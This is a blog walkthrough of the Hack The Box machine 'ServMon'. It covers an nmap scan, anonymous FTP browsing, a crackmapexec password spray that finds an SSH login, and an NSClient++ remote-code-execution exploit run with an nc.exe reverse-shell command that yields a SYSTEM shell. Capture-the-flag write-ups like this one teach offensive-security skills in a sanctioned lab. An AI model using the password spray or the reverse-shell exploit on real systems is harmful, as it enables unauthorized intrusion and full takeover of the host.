SERVMON WRITEUP

NMAP SCANS


    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 12:11 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 12:11
    Completed NSE at 12:11, 0.00s elapsed
    Initiating NSE at 12:11
    Completed NSE at 12:11, 0.00s elapsed
    Initiating NSE at 12:11
    Completed NSE at 12:11, 0.00s elapsed
    Initiating Ping Scan at 12:11
    Scanning 10.10.10.184 [4 ports]
    Completed Ping Scan at 12:11, 0.64s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:11
    Completed Parallel DNS resolution of 1 host. at 12:11, 0.55s elapsed
    Initiating SYN Stealth Scan at 12:11
    Scanning 10.10.10.184 [1000 ports]
    Discovered open port 139/tcp on 10.10.10.184
    Discovered open port 22/tcp on 10.10.10.184
    Discovered open port 80/tcp on 10.10.10.184
    Discovered open port 21/tcp on 10.10.10.184
    Discovered open port 445/tcp on 10.10.10.184
    Discovered open port 135/tcp on 10.10.10.184
    Completed SYN Stealth Scan at 12:11, 3.82s elapsed (1000 total ports)
    Initiating Service scan at 12:11
    Scanning 6 services on 10.10.10.184
    Completed Service scan at 12:13, 129.20s elapsed (6 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.184
    Retrying OS detection (try #2) against 10.10.10.184
    Initiating Traceroute at 12:13
    Completed Traceroute at 12:13, 0.53s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 12:13
    Completed Parallel DNS resolution of 2 hosts. at 12:13, 0.40s elapsed
    NSE: Script scanning 10.10.10.184.
    Initiating NSE at 12:13
    NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
    Completed NSE at 12:13, 22.17s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 1.45s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Nmap scan report for 10.10.10.184
    Host is up (0.86s latency).
    Not shown: 651 filtered ports, 343 closed ports
    PORT    STATE SERVICE       VERSION
    21/tcp  open  ftp           Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_01-18-20  12:05PM       <DIR>          Users
    | ftp-syst: 
    |_  SYST: Windows_NT
    22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
    |   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
    |_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
    80/tcp  open  http
    | fingerprint-strings: 
    |   GetRequest, HTTPOptions, RTSPRequest: 
    |     HTTP/1.1 200 OK
    |     Content-type: text/html
    |     Content-Length: 340
    |     Connection: close
    |     AuthInfo: 
    |     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    |     <html xmlns="http://www.w3.org/1999/xhtml">
    |     <head>
    |     <title></title>
    |     <script type="text/javascript">
    |     window.location.href = "Pages/login.htm";
    |     </script>
    |     </head>
    |     <body>
    |     </body>
    |     </html>
    |   NULL: 
    |     HTTP/1.1 408 Request Timeout
    |     Content-type: text/html
    |     Content-Length: 0
    |     Connection: close
    |_    AuthInfo:
    |_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Site doesn't have a title (text/html).
    135/tcp open  msrpc         Microsoft Windows RPC
    139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp open  microsoft-ds?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port80-TCP:V=7.80%I=7%D=6/21%Time=5EEF010B%P=x86_64-pc-linux-gnu%r(NULL
    SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
    SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
    SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
    SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
    SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
    SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
    SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
    SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
    SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
    SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
    SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
    SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
    SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
    SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
    SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
    SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
    SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
    SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
    SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
    SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
    SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
    SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
    SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
    SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
    SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
    SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
    SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
    SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
    SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
    Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 7 Enterprise SP1 (92%), Microsoft Windows 8 (92%), Microsoft Windows Vista SP1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=261 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 4m55s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-06-21T06:48:29
    |_  start_date: N/A

    TRACEROUTE (using port 995/tcp)
    HOP RTT       ADDRESS
    1   521.41 ms 10.10.14.1
    2   521.53 ms 10.10.10.184

    NSE: Script Post-scanning.
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 170.22 seconds
            Raw packets sent: 1836 (84.788KB) | Rcvd: 453 (21.422KB)

FTP LOGINS AND ENUMERATION

Since nmap identified that anonymous FTP was permitted, I’ll grab all of the files there with wget -r ftp://anonymous:@10.10.10.184 (this would be not a great idea on a real server where I’d be tons of stuff, but works well for a CTF like HTB). There were two files:


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #ftp 10.10.10.184
    Connected to 10.10.10.184.
    220 Microsoft FTP Service
    Name (10.10.10.184:root): anonymous
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 User logged in.
    Remote system type is Windows_NT.
    ftp> cd Users
    250 CWD command successful.
    ftp> cd Nadine
    250 CWD command successful.
    ftp> ls
    200 PORT command successful.
    125 Data connection already open; Transfer starting.
    01-18-20  12:08PM                  174 Confidential.txt
    226 Transfer complete.
    ftp> cd ../Nathan
    250 CWD command successful.
    ftp> ls
    200 PORT command successful.
    150 Opening ASCII mode data connection.
    01-18-20  12:10PM                  186 Notes to do.txt
    226 Transfer complete.
    ftp> 

SMB ENUMERATION

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #smbclient -L 10.10.10.184
    Enter WORKGROUP\root's password: 
    session setup failed: NT_STATUS_ACCESS_DENIED
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #

WEBSITE ENUMEARTION

https://www.exploit-db.com/exploits/48311

CRACKING PASSWORDS


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ # crackmapexec smb 10.10.10.184 -u nathan -p pass.txt 
    SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ # crackmapexec smb 10.10.10.184 -u nadine -p pass.txt 
    SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [+] SERVMON\nadine:L1k3B1gBut7s@W0rk 

SSH LOGIN USER ACCESS


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #ssh nadine@10.10.10.184
    nadine@10.10.10.184's password: 


    Microsoft Windows [Version 10.0.18363.752]
    (c) 2019 Microsoft Corporation. All rights reserved.

    nadine@SERVMON C:\Users\Nadine>ls
    'ls' is not recognized as an internal or external command,
    operable program or batch file.

    nadine@SERVMON C:\Users\Nadine>dir
    Volume in drive C has no label.
    Volume Serial Number is 728C-D22C

    Directory of C:\Users\Nadine

    08/04/2020  23:16    <DIR>          .
    08/04/2020  23:16    <DIR>          ..
    18/01/2020  11:23    <DIR>          3D Objects    
    18/01/2020  11:23    <DIR>          Contacts      
    08/04/2020  22:28    <DIR>          Desktop       
    08/04/2020  22:28    <DIR>          Documents     
    18/01/2020  11:23    <DIR>          Downloads     
    08/04/2020  22:27    <DIR>          Favorites     
    08/04/2020  22:27    <DIR>          Links
    18/01/2020  11:23    <DIR>          Music
    18/01/2020  11:31    <DIR>          OneDrive      
    18/01/2020  11:23    <DIR>          Pictures      
    18/01/2020  11:23    <DIR>          Saved Games   
    18/01/2020  11:23    <DIR>          Searches      
    18/01/2020  11:23    <DIR>          Videos        
                0 File(s)              0 bytes     
                15 Dir(s)  27,858,857,984 bytes free

    nadine@SERVMON C:\Users\Nadine>cd Desktop

    nadine@SERVMON C:\Users\Nadine\Desktop>dir
    Volume in drive C has no label.
    Volume Serial Number is 728C-D22C

    Directory of C:\Users\Nadine\Desktop

    08/04/2020  22:28    <DIR>          .
    08/04/2020  22:28    <DIR>          ..
    21/06/2020  08:06                34 user.txt
                1 File(s)             34 bytes
                2 Dir(s)  27,859,218,432 bytes free

    nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
    1ef91a525ec2fab2d6a65fc0a385d66f

    nadine@SERVMON C:\Users\Nadine\Desktop>

GETTING ROOT ACCESS


NSClient++ exploit was not working for me in browser so I used this one!!


    ─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #searchsploit nsclient
    ----------------------------------------------------------------------------------------------------- ---------------------------------
    Exploit Title                                                                                       |  Path
    ----------------------------------------------------------------------------------------------------- ---------------------------------
    NSClient++ 0.5.2.35 - Authenticated Remote Code Execution                                            | json/webapps/48360.txt
    NSClient++ 0.5.2.35 - Privilege Escalation                                                           | windows/local/46802.txt
    ----------------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #searchsploit -m json/webapps/48360.txt
    Exploit: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
        URL: https://www.exploit-db.com/exploits/48360
        Path: /usr/share/exploitdb/exploits/json/webapps/48360.txt
    File Type: Python script, ASCII text executable, with CRLF line terminators

    Copied to: /root/Desktop/HTB/servmon/48360.txt


    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #

Exploiting it using script


    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #mv 48360.txt exploit.py
    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #chmod +x exploit.py 
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #python3 exploit.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.12 9009 -e cmd.exe"
    [!] Targeting base URL https://127.0.0.1:8443
    [!] Obtaining Authentication Token . . .
    [+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
    [!] Enabling External Scripts Module . . .
    [!] Configuring Script with Specified Payload . . .
    [+] Added External Script (name: nnXjfcSwKTn)
    [!] Saving Configuration . . .
    [!] Reloading Application . . .
    [!] Waiting for Application to reload . . .
    [!] Obtaining Authentication Token . . .
    [+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
    [!] Triggering payload, should execute shortly . . .
    [!] Timeout exceeded. Assuming your payload executed . . .

Listening over the given port


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #nc -lnvp 9009
    listening on [any] 9009 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.184] 49940
    Microsoft Windows [Version 10.0.18363.752]
    (c) 2019 Microsoft Corporation. All rights reserved.

    C:\Program Files\NSClient++>whoami
    whoami
    nt authority\system

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: